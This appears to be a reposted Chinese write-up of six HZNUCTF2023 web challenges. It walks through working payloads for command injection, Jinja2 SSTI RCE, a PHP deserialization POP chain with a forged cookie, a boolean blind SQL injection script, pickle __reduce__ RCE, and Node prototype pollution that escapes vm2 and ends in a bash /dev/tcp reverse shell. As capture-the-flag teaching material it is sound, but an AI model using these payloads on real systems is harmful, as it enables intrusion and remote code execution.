我的编程空间,编程开发者的网络收藏夹
学习永远不晚

HZNUCTF2023 web

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

HZNUCTF2023 web

目录

<1> guessguessguess

<2> ezflask(无过滤ssti)

​ <3> ppppop(cookie泄露+反序列化)

<4> ezlogin(bool盲注)

<5> ezpickle(pickle反序列化)

<6> eznode(原型链污染)


<1> guessguessguess

尝试是否存在sql注入,发现他会对内容进行倒叙  框里有一个hint 我们试着 传入 tnih 看看有什么

金 "命令执行" 同时参数名为 cmd 应该是命令执行

ls /看一下,没找到flag 

最后执行 env flag在环境变量里

password: admin","username: docker
password: docker", "username: mxx307
password: mxxxxxxx3333000777", "username: FLAG_IN_HERE
password: 不给你看");$cmd = strrev($_POST['cmd']);if($cmd != 'hint' && $cmd != 'phpinfo'){ echo "your SQL: SELECT * FROM users WHERE id=$cmd"; echo "
";}if($cmd == "phpinfo") { eval('phpinfo();');} else if(preg_match('/127.0.0.1/',$cmd) && !preg_match('/;|&/',$cmd )) { system('ping '.$cmd);} else if($cmd == "hint") { echo '可爱的CTFer哟,你掉的是这个金"命令执行",还是这个银"XSS"还是这个普通的"SQL注入"呢?';}else if(preg_match('/^\d$/',$cmd, $matches)) { if($matches[0] <= 4 && $matches[0] >= 1){ echo $userArr[$matches[0] - 1]; } else { echo "no user"; }}else { echo "猜猜猜";}

<2> ezflask(无过滤ssti)

结合名称 + 提示 /?name= 应该是考察SSTI

传入?name=123 看看 

和guess差不多,依然是倒序 传入 }}7*7{{ 得到回显是49

在线文本反转_字符串反转_实时逆序字符串文本_汇享在线工具箱 

找基类 下面的记得反转

{{"".__class__}} 得到空字符串类 

 {{"".__class__.__mro__}}  得到:,

 {{"".__class__.__mro__[-1]}} 得到

得到基类之后,找到这个基类的子类集合

{{"".__class__.__mro__[-1].__subclasses__()}}

这里使用其第133个类([0]是第一个类 因此第133个是[132] )

这个类有个popen方法可以执行系统命令

实例化我们找到的类对象

 {{"".__class__.__mro__[-1].__subclasses__()[132].__init__}}

找到这个实例化对象的所有方法

{{"".__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__}} 

调用popen方法,进行rce 在环境变量里得到flag

{{"".__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('env').read()}}

<3> ppppop(cookie泄露+反序列化)

进去一片空白,在cookie中发现了一串base64编码

Cookie:user=Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MDt9

解码后得到一串序列化格式的字符串:O:4:"User":1:{s:7:"isAdmin";b:0;}

应该是判断是否Admin 这里bool值为0 所以空白 改为1 base64加密后放到cookie里访问试试

Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MTt9

得到源码:

className;        $funcName = $this->funcName;        $class->$funcName($this->args);    }}class B {    public function __call($func, $arg) {        $func($arg[0]);    }}if(checkUser()) {    highlight_file(__FILE__);    $payload = strrev(base64_decode($_POST['payload']));    unserialize($payload);}

就一个节点,很短的链子:A::__destruct() => B::__call()

利用点在于 触发 __call() 

__call() 在一个对象的上下文中,如果调用的方法不存在的时候,它将被触发

 poc如下:

className = $b;$a->funcName = "system";$a->args = "env";echo base64_encode(strrev(serialize($a)));?>

注:记得带着构造好的cookie

<4> ezlogin(bool盲注)

题目进去之后 是一个登录框 源码里给出了一部分过滤的关键词

同时,可以知道传入的username参数 是经过base64解码翻转才得到的

$username = strrev(base64_decode($_POST['username']));$username = preg_replace('/select|union|and|database/', "hznuctf2023", $username);

这样的话,写脚本就麻烦一些了 我们先fuzz一下看看还有没有过滤其他的关键词

 like   or    #   ord   if   left   right  ||  ^  >  < 等都没被过滤

1'or1like1#

 为真的话 就回显:success!! you are the best web手

假: username or password is invalid

可以以此盲注

preg_replace可以大写绕过,SELECT DATABASE

 poc脚本如下:

import base64import requestsimport times = requests.session()url = "http://node2.anna.nssctf.cn:28876/"flag = ''i=0while True:    i = i + 1    Max = 128    Min = 32    Mid = (Max + Min) // 2    while Min < Max:        #payload = "1^(substr(database(),{},1)='{}')^1".format(i,j)        #payload = "1'or(ord(substr(DATABASE(),{},1))>{})#".format(i,Mid)        #payload = "1'or(ord(substr((SELECTGROUP_CONCAT(TABLE_NAME)FROMINFORMATION_SCHEMA.TABLESWHERETABLE_SCHEMAlike'users'),{},1))>{})#".format(i,Mid)        #payload = "1'or(ord(substr((SELECTGROUP_CONCAT(COLUMN_NAME)FROMINFORMATION_SCHEMA.COLUMNSWHERETABLE_NAMElike'user'),{},1))>{})#".format(i, Mid)        payload = "1'or(ord(substr((SELECTGROUP_CONCAT(Password)FROMuser),{},1))>{})#".format(i, Mid)        payload = base64.b64encode(payload[::-1].encode('utf-8')).decode('utf-8')        data={            'username':payload        }        r = requests.post(url=url,data=data)        if "success" in r.text:            Min = Mid + 1            Mid = (Min + Max) // 2        else:            Max = Mid            Mid = (Min + Max) // 2    flag = flag + chr(Mid)    if Mid == 32:        break    print(flag)    # 速度太快显示不完全    time.sleep(0.5)

数据库为:users 表名为:user 字段得到:Host,User,Password,Select_priv,Insert_priv等等

<5> ezpickle(pickle反序列化)

import base64import picklefrom flask import Flask, requestapp = Flask(__name__)@app.route('/')def index():    with open('app.py', 'r') as f:        return f.read()@app.route('/calc', methods=['GET'])def getFlag():    payload = request.args.get("payload")    pickle.loads(base64.b64decode(payload).replace(b'os', b''))    return "ganbadie!"@app.route('/readFile', methods=['GET'])def readFile():    filename = request.args.get('filename').replace("flag", "????")    with open(filename, 'r') as f:        return f.read()if __name__ == '__main__':    app.run(host='0.0.0.0')

可以看到在 /calc路由  可以get传入payload参赛,会被 pickle.loads()  存在pickle反序列化

题目中过滤了os,我们使用字符串拼接绕过.

题目中还有一个读文件的路由,那么我们就将我们想要得知的命令执行的结果通过tee写到a中,然后通过/readFile路由读取命令执行结果

poc如下:

import pickleimport base64class A():    def __reduce__(self):        return (eval,("__import__('o'+'s').system('env | tee a')",))a = A()b = pickle.dumps(a)print(base64.b64encode(b))

也可以用 exec来命令执行,import一下base64 对命令编码一下

def __reduce__(self):        cmd = f'import base64; exec(base64.b64decode("{encoded_payload}"));'        return exec, (cmd,)

如果靶机不出网的话还可以用os.popen结合time.sleep盲注(姿势太多了)

<6> eznode(原型链污染)

 进去之后 得到提示:

POST some json shit to /. no source code and try to find source code

一般nodejs网站的源文件是app.js 访问 /app.js 得到源码

const express = require('express');const app = express();const { VM } = require('vm2');app.use(express.json());const backdoor = function () {    try {        new VM().run({}.shellcode);    } catch (e) {        console.log(e);    }}const isObject = obj => obj && obj.constructor && obj.constructor === Object;const merge = (a, b) => {    for (var attr in b) {        if (isObject(a[attr]) && isObject(b[attr])) {            merge(a[attr], b[attr]);        } else {            a[attr] = b[attr];        }    }    return a}const clone = (a) => {    return merge({}, a);}app.get('/', function (req, res) {    res.send("POST some json shit to /.  no source code and try to find source code");});app.post('/', function (req, res) {    try {        console.log(req.body)        var body = JSON.parse(JSON.stringify(req.body));        var copybody = clone(body)        if (copybody.shit) {            backdoor()        }        res.send("post shit ok")    }catch(e){        res.send("is it shit ?")        console.log(e)    }})app.listen(3000, function () {    console.log('start listening on port 3000');});

审计一下

这里存在backdoor方法,其中创建了一个VM环境,将shellcode属性放在其中执行,这里存在vm沙箱逃逸 利用原型链污染 写入shellcode执行

const backdoor = function () {    try {        new VM().run({}.shellcode);    } catch (e) {        console.log(e);    }}

再看一下,怎么执行这个backdoor() 方法 发现需要满足 copybody.shit 值为true

app.post('/', function (req, res) {    try {        console.log(req.body)        var body = JSON.parse(JSON.stringify(req.body));        var copybody = clone(body)        if (copybody.shit) {            backdoor()        }        res.send("post shit ok")    }catch(e){        res.send("is it shit ?")        console.log(e)    }})

可以看到 copybody属性执行了一次clone,跟进clone 典型的merge的原型链污染

const isObject = obj => obj && obj.constructor && obj.constructor === Object;const merge = (a, b) => {    for (var attr in b) {        if (isObject(a[attr]) && isObject(b[attr])) {            merge(a[attr], b[attr]);        } else {            a[attr] = b[attr];        }    }    return a}const clone = (a) => {    return merge({}, a);}

因此我们这里的思路就是需要传入一个json格式的shit属性,其值为1即可,然后通过原型链污染,将shellcode属性赋值为恶意代码,最后的payload如下

{"shit": "1", "__proto__": {"shellcode": "let res = import('./app.js')\n    res.toString.constructor(\"return this\")\n    ().process.mainModule.require(\"child_process\").execSync('bash -c \"bash -i >& /dev/tcp/vps/ip 0>&1\"').toString();"}}

注:请求头需要为Content-Type: application/json

来源地址:https://blog.csdn.net/weixin_63231007/article/details/130044576

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

HZNUCTF2023 web

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

2023-09-02

Web 1.0、Web 2.0 和 Web 3.0 之间的比较

💂 个人网站:【海拥】【摸鱼小游戏】【神级源码资源网站】🤟 风趣幽默的前端学习课程:👉28个案例趣学前端💅 想寻找共同学习交流、摸鱼划水的小伙伴,请点击【摸鱼学习交流群】&
2023-08-18

小白学Web之Web前端

编程学习网:小白的福利,Web前端的几大阶段学习及掌握。
小白学Web之Web前端
2024-04-23

Python 搭建Web站点之Web服务器与Web框架

之前用 Django 做过一个小的站点,感觉Django太过笨重,于是就准备换一个比较轻量级的 Web 框架来玩玩。Web.py 作者已经挂掉,项目好久没有更新,所以不准备用它。而 Flask 也是一个成熟的轻量级 Web 框架,在 git
2022-06-04

web前端:web的应用模式

编程学习网:web的本意是蜘蛛网和网的意思,在网页设计中我们称为网页的意思。现广泛译作网络、互联网等技术领域。表现为三种形式,即超文本(hypertext)、超媒体(hypermedia)、超文本传输协议(HTTP)等。
web前端:web的应用模式
2024-04-23

Python web开发:6本web开发

Python作为一种灵活好学的脚本语言,已经越来越受程序员的欢迎和热捧,甚至成为程序员的必备技能。Python的Web开放框架如Django,Flask,更是得到了广大的应用,今天为大家推荐几本有关python web开发的书籍。1.《Dj
2023-01-31
2023-09-05

web前端:什么是web前端?Web前端好入门吗?

编程学习网:前端技术一般分为前端设计和前端开发,前端设计一般可以理解为网站的视觉设计,前端开发则是网站的前台代码实现,包括基本的HTML和CSS以及Javascript/ajax,现在最新的高级版本HTML5、CSS3,以及SVG等。
web前端:什么是web前端?Web前端好入门吗?
2024-04-23

Web前端:Web前端性能优化

编程学习网:脚本简单地说就是一条条的文字命令,这些文字命令是可以看到的(如可以用记事本打开查看、编辑),脚本程序在执行时,是由系统的一个解释器,将其一条条的翻译成机器可识别的指令,并按程序顺序执行。因为脚本在执行时多了一道翻译的过程,所以它比二进制程序执行效率要稍低一些。
Web前端:Web前端性能优化
2024-04-23
2023-09-07
2023-09-03
2023-09-16
2023-09-09

Visual Web Developer Web创建方式是什么

今天就跟大家聊聊有关Visual Web Developer Web创建方式是什么,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。组合使用Visual Web Developer We
2023-06-17

ASP Web 服务:点亮 Web 开发的火花

优点平台无关性:Web 服务可以在任何支持 XML 和 SOAP 的平台上构建和部署,包括 Windows、Linux 和 macOS。可重用性:Web 服务可以轻松地跨应用程序和服务重用,从而减少开发时间和成本。松散耦合:Web 服务使用松散耦合架构,使得应用程序可以独立地开发和维护。可扩展性:Web 服务可以轻松地
ASP Web 服务:点亮 Web 开发的火花
2024-04-03

web前端:meta

编程学习网:因特网起源于美国国防部高级研究计划管理局建立的阿帕网。网站(Website)开始是指在因特网上根据一定的规则,使用html(标准通用标记语言下的一个应用)等工具制作的用于展示特定内容相关网页的集合。简单地说,网站是一种沟通工具,人们可以通过网站来发布自己想要公开的资讯,或者利用网站来提供相关的网络服务。
web前端:meta
2024-04-23

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录